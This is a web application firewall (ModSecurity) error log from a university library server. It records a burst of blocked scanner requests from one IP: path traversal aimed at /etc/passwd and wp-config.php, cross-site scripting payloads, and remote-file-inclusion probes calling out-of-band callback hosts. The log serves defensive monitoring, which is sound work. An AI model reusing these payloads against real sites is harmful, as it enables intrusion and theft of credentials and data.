[Tue Aug 29 11:55:45.549194 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAolKv8AAAAe"]
[Tue Aug 29 11:55:46.535872 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqqtjMAAAAA"]
[Tue Aug 29 11:55:46.632040 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq-HYEAAAAT"]
[Tue Aug 29 11:55:46.730778 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAAq@sZgAAAAM"]
[Tue Aug 29 11:55:46.735256 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAq5@FsAAAAK"]
[Tue Aug 29 11:55:47.693002 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAApbUokAAAAh"]
[Tue Aug 29 11:55:48.568423 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAqTvykAAAAa"]
[Tue Aug 29 11:55:48.569183 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAqSw0sAAAAN"]
[Tue Aug 29 11:55:51.961600 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16V8Co-f0AAAolKx0AAAAe"]
[Tue Aug 29 11:55:52.177852 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqY6LkAAAAr"]
[Tue Aug 29 11:55:52.196495 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0nfb66smhduy4h.oast.site found within TX:1: cjmnijtjmimvgniikdb0nfb66smhduy4h.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAAqY6LoAAAAr"]
[Tue Aug 29 11:55:52.647978 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0i1h9sydq6wonu.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0i1h9sydq6wonu.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardContent"] [unique_id "ZO16WMCo-f0AAApbUqwAAAAh"]
[Tue Aug 29 11:55:52.686415 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:plugin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:plugin: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/whizz/plugins/delete-plugin.php"] [unique_id "ZO16WMCo-f0AAAolKyYAAAAe"]
[Tue Aug 29 11:55:53.823105 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:bgColor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:bgColor: _000000\\x22onload=\\x22prompt(1)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/Telerik.ReportViewer.axd"] [unique_id "ZO16WcCo-f0AAAqY6MMAAAAr"]
[Tue Aug 29 11:55:53.855952 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0otddht3ojk1rh.oast.site/ found within TX:1: cjmnijtjmimvgniikdb0otddht3ojk1rh.oast.site/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss"] [unique_id "ZO16WcCo-f0AAAqTvzUAAAAa"]
[Tue Aug 29 11:55:53.942969 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:msgId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')// found within ARGS:msgId: ';alert('document.domain')//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/carbon/admin/login.jsp"] [unique_id "ZO16WcCo-f0AAAqSw1kAAAAN"]
[Tue Aug 29 11:55:55.687590 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16W8Co-f0AAAolKzQAAAAe"]
[Tue Aug 29 11:55:56.596080 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XMCo-f0AAAqeFfIAAAAx"]
[Tue Aug 29 11:55:56.713236 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:s: ax6zt\\x22><script>alert(document.domain)</script>y6uu6"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16XMCo-f0AAApbUrsAAAAh"]
[Tue Aug 29 11:55:57.599843 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqSw2wAAAAN"]
[Tue Aug 29 11:55:58.611118 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAArB1tUAAAAV"]
[Tue Aug 29 11:55:58.760719 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqSw3QAAAAN"]
[Tue Aug 29 11:56:00.146988 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAApa-QsAAAAg"]
[Tue Aug 29 11:56:00.626061 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAArC7c4AAAAW"]
[Tue Aug 29 11:56:01.536398 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq@sdQAAAAM"]
[Tue Aug 29 11:56:01.538923 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqSw4UAAAAN"]
[Tue Aug 29 11:56:02.592833 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foruserlogin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foruserlogin: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/dolibarr/adherents/cartes/carte.php"] [unique_id "ZO16YsCo-f0AAAqY6OsAAAAr"]
[Tue Aug 29 11:56:02.678497 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keyword_search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: --!>\\x22  found within ARGS:keyword_search: --!>\\x22 autofocus onfocus=alert(/2Ue0IXhHNjNl9QMpplilzBsRqJA/);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/properties/"] [unique_id "ZO16YsCo-f0AAAqSw44AAAAN"]
[Tue Aug 29 11:56:03.557035 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO16Y8Co-f0AAArC7d8AAAAW"]
[Tue Aug 29 11:56:03.560074 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16Y8Co-f0AAAq5@LMAAAAK"]
[Tue Aug 29 11:56:03.569100 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16Y8Co-f0AAApbUtwAAAAh"]
[Tue Aug 29 11:56:04.595080 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAq5@LsAAAAK"]
